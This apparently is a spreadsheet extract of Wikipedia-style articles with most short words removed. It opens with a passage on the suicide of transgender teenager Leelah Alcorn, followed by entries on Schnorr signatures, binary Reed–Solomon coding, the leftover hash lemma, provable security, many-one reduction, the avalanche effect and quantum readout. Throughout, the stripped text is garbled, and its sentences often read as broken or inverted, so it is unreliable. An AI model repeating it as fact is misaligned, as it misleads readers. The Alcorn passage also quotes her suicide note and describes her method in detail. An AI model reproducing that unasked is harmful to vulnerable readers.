tone" "would things like 'you'll never real girl' 'what're going fuck boys?' 'god's going send straight hell'. these made feel awful myself, christian time thought hated deserve alive." further, explained, tried absolute hardest live standards straight male, eventually realized hated religion parents." reddit, alcorn also disclosed prescribed increasing dosages anti-depressant prozac. concluding post, wrote, "please help know can't take much this." alcorn's computer recovered near site suicide. contained conversations showing planned jump bridge crosses interstate days incident, contacted crisis hotline and, told friend, "basically cried [her] eyes couple hours talking lady there". death prior death december 2014, alcorn scheduled suicide note automatically posted tumblr account 5:30 note, stated intention life, commenting: decided i've enough. never going transition successfully, even move out. never going happy look sound. never going enough friends satisfy never going enough love satisfy never going find loves never going happy. either live rest life lonely wishes woman live life lonelier woman hates herself. there's winning. there's out. enough already, need life worse. people gets better" true case. gets worse. each worse. that's gist that's feel like killing myself. sorry that's good enough reason you, good enough expressed wish possessions money donated transgender advocacy charity, called issues surrounding gender identity taught schools. note ended statement: death needs mean something. death needs counted number transgender people commit suicide year. want someone look number 'that's fucked society. please." second post appeared shortly after; titled "sorry", featured apology close friends siblings trauma suicide would through, also contained message parents: "fuck you. can't control people like that. that's messed up." additional, handwritten suicide note reading "i've enough" found bed, thrown away alcorn's mother police made copy.in early morning december police informed news sources walking along interstate near union township struck semi-trailer 2:30 near south lebanon exit. died scene. believed alcorn walked three four miles (4.8 parents' kings mills house struck. highway closed hour incident. investigation launched ohio state highway patrol, alcorn's body transported montgomery county coroner, autopsy scheduled. truck driver physically injured collision.by morning december suicide note reposted tumblr 200,000 times. writing boston globe, reporter maura johnston described "passionate post". suicide note later deleted alcorn's parents asked removed, blog made inaccessible public. according family minister, alcorn family decided hold funeral privately receiving threats. alcorn's body reportedly cremated. ohio state patrol completed investigation alcorn's death april 2015, officially ruling suicide. reaction alcorn's parents december 2:56 p.m., alcorn's mother, carla wood alcorn, posted public message social media website facebook, stating: sweet 16-year-old son, joshua ryan alcorn, went home heaven morning. early morning walk truck. thank messages kindness concern sent way. please continue keep prayers." carla alcorn's post subsequently deleted. alcorn family publicly requested given privacy grieve statement issued kings local school district. statement, staff alcorn's former school, kings high school, declared "joshua alcorn sweet, talented, tender-hearted 17-year-old", adding counselors would made available students affected incident. moment silence held alcorn's memory kings high basketball game december some alcorn's supporters publicly criticized teen's mother, carla alcorn, misgendering deadnaming daughter facebook post announcing teenager's death. some individuals—termed "the internet's self-appointed vigilantes" washington post—subsequently doxed harassed carla facebook account revenge" leelah's death. twitter, american rights activist savage argued alcorn's parents prosecuted role bringing daughter's death, commenting actions "threw front truck". cited successful prosecution dharun ravi following suicide tyler clementi legal precedent action. added legal action also brought conversion therapists counseled leelah, suggested alcorns lose custody children.carla alcorn responded criticism interview cnn, stating loved unconditionally. loved matter what. loved son. people need know loved him. good kid, good boy." although acknowledging leelah requested transition surgery, carla stated never heard child name "leelah", reiterating refusal accept child's gender identity, adding support that, religiously." expressed concern users social media thought "horrible person", defended actions dealing child, stating example banned internet access prevent access "inappropriate" things. email cincinnati-based channel wcpo-tv, leelah's father doug alcorn wrote, love son, joshua, much devastated death. desire enter political storm debate people know him. wish grieve private. harbor towards anyone. simply wish words used us."writing salon, mary elizabeth williams commented would cruel inaccurate suggest carla alcorn love child," added carla's statement "loved unconditionally" revealed tragic lack understanding word 'unconditionally', even death". people magazine quoted johanna olson, medical director center trans youth health development children's hospital angeles, stating "did leelah's parents love her? yes, sure did. support her? didn't. that's tragedy." mara keisling, executive director national center transgender equality, quoted stating blaming alcorn's parents unhelpful, adding, "despite great cultural policy advances transgender people made, still disrespect, discrimination violence aimed child teenager kind today difficult." tributes, vigils, activism alcorn's suicide note published online, chris seelbach, first openly councilman cincinnati city council, shared part facebook message stated death showed hard transgender u.s. post shared 4,700 times increased public awareness incident. december alcorn's death attracted worldwide attention. news outlets across world picked story, hashtag #leelahalcorn topped twitter. according british newspaper independent, incident "triggered widespread anguish raised debate rights transgender people." u.s.-based boston globe stated "served flashpoint transgender progress 2014," republic referred "sparked national conversation plight transgender kids scanty rights respect society affords them."on january 2015, cincinnati-based lgbt rights group support marriage equality ohio hosted vigil alcorn outside kings high school. candlelight vigil goodale park, columbus held january group called stand leelah. vigil organized diverse city youth chorus partnership cincinnati chapter gay, lesbian straight education network clifton cultural arts center january vigil location clifton cultural arts center moved woodward theater make larger setting. event attended people.a january vigil scheduled trafalgar square london; organizer quoted saying "[alcorn's] death political death. when member community brutalised hands oppression must fight back." those spoke event included politician sarah brown novelist poet kaveney. marches carried honor alcorn northwest, washington, d.c. queen street, auckland january day, candlelight vigil held york city's columbus circle. memorial protest conversion therapy memory alcorn took place lynchburg, virginia, january 2015.among transgender celebrities publicly responded incident janet mock, andreja pejić, laverne cox, musician toro released song, "for lost brave," dedication alcorn. joey soloway, writer television show transparent, dedicated golden globe award best television series alcorn. during diane sawyer's interview caitlyn jenner, confirmed jenner's transgender identity, alcorn mentioned name message "fix society. please," broadcast. june 2015, singer miley cyrus founded happy hippie foundation, organization raise awareness homelessness lgbt issues among young people, partly response alcorn's death. promote organization, released series backyard sessions videos, second which, dido's freedom" dedicated alcorn. after reading alcorn's death, british musician declan mckenna inspired write song, "paracetamol," included debut album what think about car? discusses media's representation lgbt communities. 2015, nation-wide non-profit organization ally parents, operated stand trans, created response leelah's death. carolyn washburn, editor ohio newspaper cincinnati enquirer, stated incident "raises important issues hope prompt conversations families throughout region." washburn also received letters derided newspaper's alcorn's chosen name covering death. when contacted cincinnati enquirer, shane morgan, founder chair transgender advocate group transohio, stated 2014 witnessed gains trans rights movement, alcorn's death illustrated "trans people still victimized still disrespected", highlighting high rate transgender people murdered year. since incident, transohio received letters parents transgender children describing alcorn's death affected them. morgan stated understood anger directed toward alcorn's parents, "there's excuse threats family."allison woolbert, executive director transgender human rights institute, informed independent alcorn's case "not unique"; newspaper highlighted research centers disease control prevention indicating lgbt youth twice likely attempt suicide heterosexual, cisgender teenagers. newsweek similarly placed alcorn's suicide within wider context transphobic discrimination, highlighting youth suicide prevention program reports percent transgender youths attempt suicide national coalition anti-violence programs recently published report indicating percent lgbt homicide victims 2013 transgender women.kevin jennings arcus foundation also situated alcorn's death within wider problems facing young lgbt people. view, became international symbol ongoing challenges faced lgbt youth," adding death "reminds basic lesson still taught young people across america: when comes gender identity, best cisgender; comes sexual orientation, best straight."under twitter hashtag #reallivetransadult, many transgender people posted encouraging tweets younger counterparts, hashtags, #protecttranskids, term "rest power", also circulated twitter. change.org petition calling leelah's chosen name included gravestone, gained 80,000 signatures. january adam hoover marriage equality ohio remarked that, since request alcorn's chosen name gravestone seemed "like slim possibility", would raising money permanent memorial arranged bench, tree commemorative plaque.under ohio's adopt-a-highway program, group adopted interchange interstate south ohio state route 48—which alcorn died—and dedicated memory. result, ohio department transportation erected signs stating memory leelah alcorn" along road. members group affixed wreath signs; group member lisa oravec informed press want leelah forgotten... want people cincinnati, anybody driving wreath. highway. know leelah they'll google educate learn happened." december 2018, "leelah alcorn highway memorial" group continued meet four times year clean stretch road. highway memorial formed basis short documentary, leelah's highway, screened 2018 cindependent film festival cincinnati's woodward theater. creator, elizabeth littlejohn toronto, stated human rights activist believes [in] right gender self-determination, believe story needed told." leelah's facebook group called "justice leelah alcorn" established, petition calling "leelah's law," conversion therapy united states, created transgender human rights institute raise awareness psychologically harmful effects practices. january 330,009 signatures, named fastest growing change.org petition 2014. second appeal demanding enactment "leelah's law" posted people section whitehouse.gov january 2015, garnered 100,000 signatures january response petition, april 2015 president barack obama called banning conversion therapy minors.in december 2015, cincinnati became second u.s. city washington, d.c., practice conversion therapy outright; council member chris seelbach cited alcorn's suicide influence decision stated "she challenged make death matter, we're that." october 2018, four cities across ohio banned conversion therapy, leading journalist nico lang comment "the buckeye state become unlikely leader banning conversion therapy local level." also list lgbt-related suicides list people ohio list transgender people blake brockington references external links archive alcorn's tumblr blog ohio state highway patrol investigatory form girl looked like boy", poet athol williams reading poem wrote memory leelah alcorn</t>
  </si>
  <si>
    <t>Schnorr signature</t>
  </si>
  <si>
    <t>cryptography, schnorr signature digital signature produced schnorr signature algorithm described claus schnorr. digital signature scheme known simplicity, among first whose security based intractability certain discrete logarithm problems. efficient generates short signatures. covered u.s. patent 4,995,082 expired february 2008. algorithm choosing parameters users signature scheme agree group, {\displaystyle prime order, {\displaystyle generator, {\displaystyle discrete problem assumed hard. typically schnorr group used. users agree cryptographic hash function {\displaystyle h:\{0,1\}^{*}\rightarrow \mathbb _{q}} notation following, exponentiation stands repeated application group operation juxtaposition stands multiplication congruence classes application group operation applicable) subtraction stands subtraction congruence classes {\displaystyle m\in \{0,1\}^{*}} finite strings {\displaystyle s,e,e_{v}\in \mathbb _{q}} congruence classes modulo {\displaystyle {\displaystyle x,k\in \mathbb _{q}^{\times multiplicative group integers modulo {\displaystyle (for prime {\displaystyle {\displaystyle \mathbb _{q}^{\times }=\mathbb _{q}\setminus {\overline {0}}_{q}} {\displaystyle y,r,r_{v}\in generation choose private signing key, {\displaystyle allowed set. public verification {\displaystyle y=g^{x}} signing sign message, {\displaystyle choose random {\displaystyle allowed set. {\displaystyle r=g^{k}} {\displaystyle e=h(r\parallel {\displaystyle \parallel denotes concatenation {\displaystyle represented string. {\displaystyle s=k-xe} .the signature pair, {\displaystyle (s,e)} note {\displaystyle s,e\in \mathbb _{q}} {\displaystyle q&lt;2^{160}} signature representation bytes. verifying {\displaystyle r_{v}=g^{s}y^{e}} {\displaystyle e_{v}=h(r_{v}\parallel {\displaystyle e_{v}=e} signature verified. proof correctness relatively easy {\displaystyle e_{v}=e} signed message equals verified message: {\displaystyle r_{v}=g^{s}y^{e}=g^{k-xe}g^{xe}=g^{k}=r} hence {\displaystyle e_{v}=h(r_{v}\parallel m)=h(r\parallel m)=e} public elements: {\displaystyle {\displaystyle {\displaystyle {\displaystyle {\displaystyle {\displaystyle {\displaystyle private elements: {\displaystyle {\displaystyle this shows correctly signed message verify correctly; many properties required secure signature algorithm. leakage nonce reuse just closely related signature algorithms dsa, ecdsa, elgamal, reusing secret nonce value {\displaystyle schnorr signatures different messages allow observers recover private key. case schnorr signatures, simply requires subtracting {\displaystyle values: {\displaystyle s'-s=(k'-k)-x(e'-e)} {\displaystyle k'=k} {\displaystyle e'\neq {\displaystyle simply isolated. fact, even slight biases value {\displaystyle partial leakage {\displaystyle reveal private key, collecting sufficiently many signatures solving hidden number problem. security argument signature scheme constructed applying fiat–shamir transformation schnorr's identification protocol. therefore, fiat shamir's arguments), secure {\displaystyle modeled random oracle. security also argued generic group model, assumption {\displaystyle "random-prefix preimage resistant" "random-prefix second-preimage resistant". particular, {\displaystyle need collision resistant. 2012, seurin provided exact proof schnorr signature scheme. particular, seurin shows security proof using forking lemma best possible result signature schemes based one-way group homomorphisms including schnorr-type signatures guillou–quisquater signature schemes. namely, romdl assumption, algebraic reduction must lose factor {\displaystyle f({\epsilon }_{f})q_{h}} time-to-success ratio, {\displaystyle f\leq function remains close long {\displaystyle {\epsilon }_{f}} noticeably smaller {\displaystyle {\epsilon }_{f}} probability forging error making {\displaystyle q_{h}} queries random oracle. short schnorr signatures aforementioned process achieves t-bit security level 4t-bit signatures. example, 128-bit security level would require 512-bit (64-byte) signatures. security limited discrete logarithm attacks group, complexity square-root group size. schnorr's original 1991 paper, suggested since collision resistance hash required, therefore shorter hash functions secure, indeed recent developments suggest t-bit security level achieved 3t-bit signatures. then, 128-bit security level would require 384-bit (48-byte) signatures, could achieved truncating size half length bitfield. also eddsa elgamal signature scheme notes references menezes, alfred (1996), handbook applied cryptography, press. c.p. schnorr (1990), "efficient identification signatures smart cards", brassard, advances cryptology—crypto '89, 239-252, springer-verlag. lecture notes computer science, claus-peter schnorr (1991), "efficient signature generation smart cards", journal cryptology 4(3), 161–174 (ps) (pdf). external links 8235</t>
  </si>
  <si>
    <t>Binary Reed–Solomon encoding</t>
  </si>
  <si>
    <t>binary reed–solomon coding (brs), belongs code, encoding node data loss distributed storage environment. maximum distance separable (mds) encoding properties. encoding decoding rate outperforms conventional coding optimum coding. background coding fault-tolerant encoding method distributed storage environment. suppose wish distribute data across individual devices improved storage capacity bandwidth, example hardware raid setup. such configuration risks significant data loss event device failure. reed-solomon encoding produces storage coding system robust simultaneous failure subset nodes. this, adding additional nodes system, total storage nodes. traditional encoding method uses vandermonde matrix coding matrix inverse decoding matrix. traditional encoding decoding operations carried large finite domain. because encoding decoding employ shift operations, much faster traditional coding. algorithm coding proposed advanced network technology laboratory peking university, also released open source implementation coding. actual environment test, encoding decoding speed faster crs. design implementation distributed storage system, using coding make system characteristics fault tolerant regeneration. principle encoding principle structure traditional reed–solomon codes based finite fields, code based shift operation. encoding based vandermonde matrix, specific encoding steps follows: 1、equally divides original data blocks blocks, block data l-bit data, recorded {\displaystyle s=(s_{0},s_{1},...,s_{k-1})} {\displaystyle s_{i}=s_{i,0}s_{i,1}...s_{i,l-1}} {\displaystyle i=0,1,2,...,k-1} 2、builds calibration data block {\displaystyle {\displaystyle total {\displaystyle n-k} blocks: {\displaystyle m=(m_{0},m_{1},...,m_{n-k-1})} {\displaystyle m_{i}=\sum _{j=0}^{k-1}s_{j}(r_{j}^{i})} {\displaystyle i=0,1,...,n-k-1} addition operation，where {\displaystyle r_{j}^{i}} represents number bits added front original data block {\displaystyle s_{j}} .thereby forming parity data block {\displaystyle m_{i}} {\displaystyle r_{j}^{i}} given following way: {\displaystyle (r_{0}^{a},r_{1}^{a},...,r_{k-1}^{a})=(0,a,2a,...(k-1)a)} {\displaystyle a=0,1,...n-k-1} 3、each node stores data, nodes {\displaystyle n_{i}(i=0,1,...,n-1)} store data {\displaystyle s_{0},s_{1},...,s_{k-1},m_{0},m_{1},...,m_{n-k-1}} encoding example {\displaystyle n=6,k=3} {\displaystyle id_{0}=(0,0,0)} {\displaystyle id_{0}=(0,1,2)} {\displaystyle id_{0}=(0,2,4)} original data block {\displaystyle s_{i}=s_{0},s_{1},...,s_{l-1}} {\displaystyle i=0,1,...,k-1} calibration data block {\displaystyle m_{i}=m_{i,0}m_{i,1}...mx_{i,l+i\times (k-1)-1}} ，where {\displaystyle i=0,1,...,k-1} calculation calibration data blocks follows, addition operation represents operation: {\displaystyle m_{0}=s_{0}(0)\oplus s_{1}(0)\oplus s_{2}(0)} {\displaystyle m_{0}=(m_{0,0}m_{0,1}...m_{0,5})} {\displaystyle m_{1}=s_{0}(0)\oplus s_{1}(1)\oplus s_{2}(2)} {\displaystyle m_{1}=(m_{1,0}m_{1,1}...m_{1,7})} {\displaystyle m_{2}=s_{0}(0)\oplus s_{1}(2)\oplus s_{2}(4)} {\displaystyle m_{2}=(m_{2,0}m_{2,1}...m_{2,9})} decoding principle structure code, divide original data blocks {\displaystyle blocks. they {\displaystyle s=(s_{0},s_{1},...,s_{k-1})} encoding {\displaystyle block calibration data blocks, {\displaystyle m=(m_{0},m_{1},...,m_{n-k-1})} during decoding process, necessary condition: number undamaged calibration data blocks greater equal number original data blocks missing, not, cannot repaired. following decoding process analysis: might well make {\displaystyle n=6} {\displaystyle k=3} then {\displaystyle m_{0}=s_{0}+s_{1}+s_{2}} {\displaystyle m_{1}=s_{0}+xs_{1}+x^{2}s_{2}} {\displaystyle m_{1}=s_{0}+x^{2}s_{1}+x^{4}s_{2}} supposed {\displaystyle s_{0}} intact, {\displaystyle s_{1},s_{2}} miss, choose {\displaystyle m_{1}} {\displaystyle m_{2}} repair, make {\displaystyle m_{1}^{*}=m_{1}+s_{0}} {\displaystyle m_{2}^{*}=m_{2}+s_{0}} because {\displaystyle m_{1}} {\displaystyle m_{2}} {\displaystyle s_{0}} known, {\displaystyle m_{1}^{*}} {\displaystyle m_{2}^{*}} known. {\displaystyle s_{1,i-2}=m_{2,i}^{*}+s_{2,i-4}} {\displaystyle s_{2,i-2}=m_{1,i}^{*}+s_{1,i-1}} according iterative formula, cycle figure values {\displaystyle s_{1},s_{2}} bit). each original data block length {\displaystyle bit), repeating {\displaystyle times, work unknown original data block. parity reasoning, completed data decoding. performance some experiments shows that, considering encoding rate, encoding rate 6-fold much encoding rate 1.5-fold much encoding rate single core processor, meets conditions compare encoding, encoding speed upgrades less 200%. under conditions, different number deletions, decoding rate 4-fold much encoding rate, 1.3-fold much encoding rate, meets conditions compare encoding, decoding speed promotes 100%. applications current situation, application distributed systems commonly used. using erasure code store data bottom distributed storage system increase fault tolerance system. time, compared traditional replica strategy, erasure code technology exponentially improve reliability system redundancy. encoding applied distributed storage systems, example, encoding used underlying data encoding using hdfs. advantages performance similarity encoding method, encoding used replace encoding distributed systems. usage there open source codes implement encoding written available github. design implementation distributed storage system, encoding store data achieve system's fault tolerance. references hou, shum, chen basic regeneration code: binary addition shift exact repair, ieee isit 2013. chen, hanxu hou, bing zhu, zhou, lijia yumeng zhang, zigzag code optimal encoding efficient decoding[c]//big data (big data), 2014 ieee international conference ieee, 2014.</t>
  </si>
  <si>
    <t>Leftover hash lemma</t>
  </si>
  <si>
    <t>leftover hash lemma lemma cryptography first stated russell impagliazzo, leonid levin, michael luby.imagine secret uniform random bits, would like secret encrypt message. unfortunately, careless key, know adversary able learn values bits key, know bits. still key, throw away choose key? leftover hash lemma tells produce bits, adversary almost knowledge. since adversary knows bits, almost optimal. more precisely, leftover hash lemma tells extract length asymptotic {\displaystyle h_{\infty }(x)} (the min-entropy bits random variable almost uniformly distributed. words, adversary partial knowledge almost knowledge extracted value. that also called privacy amplification (see privacy amplification section article quantum distribution). randomness extractors achieve result, (normally) less randomness. random variable {\displaystyle {\mathcal {x}}} {\displaystyle m&gt;0} {\textstyle h\colon {\mathcal {s}}\times {\mathcal {x}}\rightarrow \{0,\,1\}^{m}} 2-universal hash function. {\textstyle m\leq h_{\infty }(x)-2\log \left({\frac {1}{\varepsilon }}\right)} uniform {\displaystyle {\mathcal {s}}} independent have: {\textstyle \delta \left[(h(s,x),s),(u,s)\right]\leq \varepsilon uniform {\displaystyle \{0,1\}^{m}} independent {\textstyle h_{\infty }(x)=-\log \max _{x}\pr[x=x]} min-entropy measures amount randomness has. min-entropy always less equal shannon entropy. note {\textstyle \max _{x}\pr[x=x]} probability correctly guessing (the best guess guess probable value.) therefore, min-entropy measures difficult guess {\textstyle 0\leq \delta (x,y)={\frac {1}{2}}\sum _{v}\left|\pr[x=v]-\pr[y=v]\right|\leq statistical distance also universal hashing min-entropy rényi entropy information-theoretic security references bennett, brassard, robert. privacy amplification public discussion. siam journal computing, 17(2):210-229, 1988. bennett, brassard, crepeau, maurer. generalized privacy amplification. ieee transactions information theory, 1995. håstad, impagliazzo, levin luby. pseudorandom generator one-way function. siam journal computing, 1364-1396, 1999.</t>
  </si>
  <si>
    <t>Provable security</t>
  </si>
  <si>
    <t>provable security refers type level computer security proved. used different ways different fields. usually, refers mathematical proofs, common cryptography. proof, capabilities attacker defined adversarial model (also referred attacker model): proof show attacker must solve underlying hard problem order break security modelled system. such proof generally consider side-channel attacks implementation-specific attacks, usually impossible model without implementing system (and thus, proof applies implementation). outside cryptography, term often used conjunction secure coding security design, rely proofs show security particular approach. cryptographic setting, involves attacker model model system. example, code verified match intended functionality, described model: done static checking. these techniques sometimes used evaluating products (see common criteria): security depends correctness attacker model, also model code. finally, term provable security sometimes used sellers security software attempting sell security products like firewalls, antivirus software intrusion detection systems. products typically subject scrutiny, many security researchers consider type claim selling snakeoil. cryptography cryptography, system provable security security requirements stated formally adversarial model, opposed heuristically, clear assumptions adversary access system well enough computational resources. proof security (called "reduction") security requirements provided assumptions adversary's access system satisfied clearly stated assumptions hardness certain computational tasks hold. early example requirements proof given goldwasser micali semantic security construction based quadratic residuosity problem. some proofs security given theoretical models random oracle model, real cryptographic hash functions represented idealization. there several lines research provable security. establish "correct" definition security given, intuitively understood task. another suggest constructions proofs based general assumptions much possible, instance existence one-way function. major open problem establish proofs based since existence one-way functions known follow conjecture. controversies several researchers found mathematical fallacies proofs used make claims security important protocols. following partial list researchers, names followed first reference original paper purported proof reference paper researchers reported flaws: shoup; menezes; nandi; galindo; iwata, ohashi, minematsu; nandi; j.-s. coron naccache; chakraborty, hernández-jiménez, sarkar; gaži maurer; kakvi kiltz; holenstein, künzler, tessaro.koblitz menezes written provable security results important cryptographic protocols frequently fallacies proofs; often interpreted misleading manner, giving false assurances; typically rely upon strong assumptions turn false; based unrealistic models security; serve distract researchers' attention need "old-fashioned" (non-mathematical) testing analysis. their series papers supporting claims controversial community. among researchers rejected viewpoint koblitz-menezes oded goldreich, leading theoretician author foundations cryptography. wrote refutation first paper "another look `provable security'" titled post-modern cryptography." goldreich wrote: "...we point fundamental philosophical flaws underly said article misconceptions regarding theoretical research cryptography last quarter century.": essay goldreich argued rigorous analysis methodology provable security compatible science, koblitz menezes "reactionary (i.e., play hands opponents progress).": 2007, koblitz published "the uneasy relationship between mathematics cryptography," contained controversial statements provable security topics. researchers oded goldreich, boaz barak, jonathan katz, hugo krawczyk, wigderson wrote letters responding koblitz's article, published november 2007 january 2008 issues journal. katz, coauthor highly regarded cryptography textbook, called koblitz's article "snobbery purest";: 1455 wigderson, permanent member institute advanced study princeton, accused koblitz "slander.": ivan damgård later wrote position paper icalp 2007 technical issues, recommended scott aaronson good in-depth analysis.brian snow, former technical director information assurance directorate u.s. national security agency, recommended koblitz-menezes paper "the brave world bodacious assumptions cryptography" audience conference 2010 cryptographers panel. practice oriented provable security classical provable security primarily aimed studying relationship asymptotically defined objects. instead, practice-oriented provable security concerned concrete objects cryptographic practice, hash functions, block ciphers, protocols deployed used. practice oriented provable security uses concrete security analyse practical constructions fixed sizes. "exact security" "concrete security" name given provable security reductions quantifies security computing precise bounds computational effort, rather asymptotic bound guaranteed hold "sufficiently large" values security parameter. references</t>
  </si>
  <si>
    <t>Standard model (cryptography)</t>
  </si>
  <si>
    <t>cryptography standard model model computation adversary limited amount time computational power available. other names used bare model plain model. cryptographic schemes usually based complexity assumptions, state problems, factorization, cannot solved polynomial time. schemes proven secure using complexity assumptions said secure standard model. security proofs notoriously difficult achieve standard model, many proofs, cryptographic primitives replaced idealized versions. common example technique, known random oracle model, involves replacing cryptographic hash function genuinely random function. another example generic group model, adversary given access randomly chosen encoding group, instead finite field elliptic curve groups used practice. other models used invoke trusted third parties perform task without cheating; example, public infrastructure (pki) model requires certificate authority, dishonest, could produce fake certificates forge signatures, mount middle attack read encrypted messages. other examples type common random string model, assumed parties access string chosen uniformly random, generalization, common reference string model, string chosen according probability distribution. these models often used non-interactive zero-knowledge proofs (nizk). applications, dolev–dwork–naor encryption scheme, makes sense particular party generate common reference string, applications, common reference string must generated trusted third party. collectively, models referred models special setup assumptions. references</t>
  </si>
  <si>
    <t>Many-one reduction</t>
  </si>
  <si>
    <t>computability theory computational complexity theory, many-one reduction (also called mapping reduction) reduction converts instances decision problem {\displaystyle l_{1}} instances second decision problem {\displaystyle l_{2}} instance reduced language {\displaystyle l_{2}} initial instance language {\displaystyle l_{1}} language {\displaystyle l_{2}} initial instance language {\displaystyle l_{1}} thus decide whether {\displaystyle l_{2}} instances language {\displaystyle l_{2}} decide whether {\displaystyle l_{1}} instances language applying reduction solving {\displaystyle l_{2}} thus, reductions used measure relative computational difficulty problems. said {\displaystyle l_{1}} reduces {\displaystyle l_{2}} layman's terms {\displaystyle l_{2}} harder solve {\displaystyle l_{1}} that say, algorithm solves {\displaystyle l_{2}} also used part (otherwise relatively simple) program solves {\displaystyle l_{1}} many-one reductions special case stronger form turing reductions. with many-one reductions, oracle (that solution invoked end, answer cannot modified. this means want show problem reduced problem solution solution unlike turing reduction, solution many times needed solving this means many-one reductions instances problem instances another, turing reductions compute solution problem, assuming problem easy solve. many-one reduction effective separating problems distinct complexity classes. however, increased restrictions many-one reductions make difficult find. many-one reductions first used emil post paper published 1944. later norman shapiro used concept 1956 name strong reducibility. definitions formal languages suppose {\displaystyle {\displaystyle formal languages alphabets {\displaystyle \sigma {\displaystyle \gamma respectively. many-one reduction {\displaystyle {\displaystyle total computable function {\displaystyle f:\sigma ^{*}\rightarrow \gamma ^{*}} property word {\displaystyle {\displaystyle {\displaystyle f(w)} {\displaystyle function {\displaystyle exists, {\displaystyle many-one reducible m-reducible {\displaystyle write {\displaystyle a\leq _{\mathrm }b.} injective many-one reduction function 1-reducible one-one reducible {\displaystyle write {\displaystyle a\leq _{1}b.} subsets natural numbers given sets {\displaystyle a,b\subseteq \mathbb {\displaystyle many-one reducible {\displaystyle write {\displaystyle a\leq _{\mathrm exists total computable function {\displaystyle {\displaystyle a=f^{-1}(b).} additionally {\displaystyle injective {\displaystyle 1-reducible {\displaystyle write {\displaystyle a\leq _{1}b.} many-one equivalence 1-equivalence {\displaystyle a\leq _{\mathrm }b\,\mathrm {and} \,b\leq _{\mathrm {\displaystyle many-one equivalent m-equivalent {\displaystyle write {\displaystyle a\equiv _{\mathrm }b.} {\displaystyle a\leq _{1}b\,\mathrm {and} \,b\leq _{1}a} {\displaystyle 1-equivalent {\displaystyle write {\displaystyle a\equiv _{1}b.} many-one completeness (m-completeness) {\displaystyle called many-one complete, simply m-complete, {\displaystyle recursively enumerable every recursively enumerable {\displaystyle m-reducible {\displaystyle many-one reductions resource limitations many-one reductions often subjected resource restrictions, example reduction function computable polynomial time, logarithmic space, {\displaystyle ac_{0}} {\displaystyle nc_{0}} circuits, polylogarithmic projections subsequent reduction notion weaker prior; polynomial-time reduction log-space reduction details. given decision problems {\displaystyle {\displaystyle algorithm solves instances {\displaystyle many-one reduction {\displaystyle {\displaystyle solve instances {\displaystyle time needed plus time needed reduction maximum space needed space needed reductionwe class languages subset power natural numbers) closed many-one reducibility exists reduction language language outside class closed many-one reducibility, many-one reduction used show problem reducing problem many-one reductions valuable well-studied complexity classes closed type many-one reducibility, including co-np, pspace, exp, many others. known example first four listed closed weak reduction notion polylogarithmic time projections. these classes closed arbitrary many-one reductions, however. properties relations many-one reducibility 1-reducibility transitive reflexive thus induce preorder powerset natural numbers. {\displaystyle a\leq _{\mathrm {\displaystyle \mathbb \setminus a\leq _{\mathrm }\mathbb \setminus many-one reducible halting problem recursively enumerable. this says regards many-one reducibility, halting problem complicated recursively enumerable problems. thus halting problem r.e. complete. note r.e. complete problem. specialized halting problem individual turing machine (i.e., inputs eventually halts) many-one complete universal turing machine. emil post showed exist recursively enumerable sets neither decidable m-complete, hence exist nonuniversal turing machines whose individual halting problems nevertheless undecidable. karp reductions polynomial-time many-one reduction problem problem (both usually required decision problems) polynomial-time algorithm transforming inputs problem inputs problem transformed problem output original problem. instance problem solved applying transformation produce instance problem giving input algorithm problem returning output. polynomial-time many-one reductions also known polynomial transformations karp reductions, named richard karp. reduction type denoted {\displaystyle a\leq _{m}^{p}b} {\displaystyle a\leq _{p}b} references</t>
  </si>
  <si>
    <t>Permutation box</t>
  </si>
  <si>
    <t>cryptography, permutation p-box) method bit-shuffling used permute transpose bits across s-boxes inputs, retaining diffusion transposing. block ciphers, s-boxes p-boxes used make relation plaintext ciphertext difficult understand (see shannon's property confusion). p-boxes typically classified compression, expansion, straight, depending whether number output bits less than, greater than, equal number input bits, respectively. only straight p-boxes invertible. also boolean function nothing-up-my-sleeve number substitution cipher references</t>
  </si>
  <si>
    <t>Avalanche effect</t>
  </si>
  <si>
    <t>cryptography, avalanche effect desirable property cryptographic algorithms, typically block ciphers cryptographic hash functions, wherein input changed slightly (for example, flipping single bit), output changes significantly (e.g., half output bits flip). case high-quality block ciphers, small change either plaintext cause drastic change ciphertext. actual term first used horst feistel, although concept dates back least shannon's diffusion. block cipher cryptographic hash function exhibit avalanche effect significant degree, poor randomization, thus cryptanalyst make predictions input, given output. this sufficient partially completely break algorithm. thus, avalanche effect desirable condition point view designer cryptographic algorithm device. constructing cipher hash exhibit substantial avalanche effect primary design objectives, mathematically construction takes advantage butterfly effect. this block ciphers product ciphers. also hash functions large data blocks. both features allow small changes propagate rapidly iterations algorithm, every output depend every input algorithm terminates. strict avalanche criterion strict avalanche criterion (sac) formalization avalanche effect. satisfied whenever single input complemented, output bits changes probability. builds concepts completeness avalanche introduced webster tavares 1985.higher-order generalizations involve multiple input bits. boolean functions satisfy highest order always bent functions, also called maximally nonlinear functions, also called "perfect nonlinear" functions. independence criterion independence criterion (bic) states output bits change independently single input inverted, also butterfly effect confusion diffusion references</t>
  </si>
  <si>
    <t>Quantum readout</t>
  </si>
  <si>
    <t>quantum readout method verify authenticity object. method secure provided object cannot copied physically emulated. hands-off versus hands-on authentication objects when authenticating object, distinguish cases. hands-on authentication: object fully control verifier. verifier object correct type, size, weight etc.. example, difference real tooth hologram representing tooth. hands-off authentication: verifier full control. example, line-of-sight cannot touch object.in hands-on scenario, physical unclonable functions (pufs) various types serve great authentication tokens. their physical unclonability, combined verifier's ability detect spoofing, makes exceedingly hard attacker create object pass clone. however, hands-on authentication requires holder relinquishes control acceptable, especially risk verifier impostor. hands-off scenario, however, reliable authentication much difficult achieve. prudent assume challenge-response behavior known publicly. attacker hold genuine perform measurements without discovered.) this "worst case" assumption customary security research. poses problem hands-on case, hands-off case means spoofing becomes real danger. imagine instance authentication optical glass fiber. attacker puf, knows everything receives challenge (laser light) fiber. instead scattering light physical object, following: measure incoming wave front; look corresponding response database; prepare laser light correct response state send back verifier.this attack known "digital emulation". long time spoofing hands-off scenario seemed fundamental problem cannot solved. traditional approach remote object authentication somehow enforce hands-on environment, e.g. tamper-proof trusted remote device probing object. drawbacks approach cost unknown degree security face ever sophisticated attacks. quantum-physical readout basic scheme problem spoofing hands-off case solved using fundamental information-theoretic properties quantum physics: single quantum unknown state cannot cloned. when quantum state measured information contains destroyed.based principles, following scheme proposed. enrollment. usual enrollment. quantum physics needed. enrollment data considered public. challenge. single quantum (e.g. photon) prepared random state. sent puf. response. quantum interacts (e.g. coherent scattering), resulting unitary transform state. verification. quantum returned verifier. knows exactly response state this knowledge enables perform "yes/no" verification measurement.steps repeated multiple times order exponentially 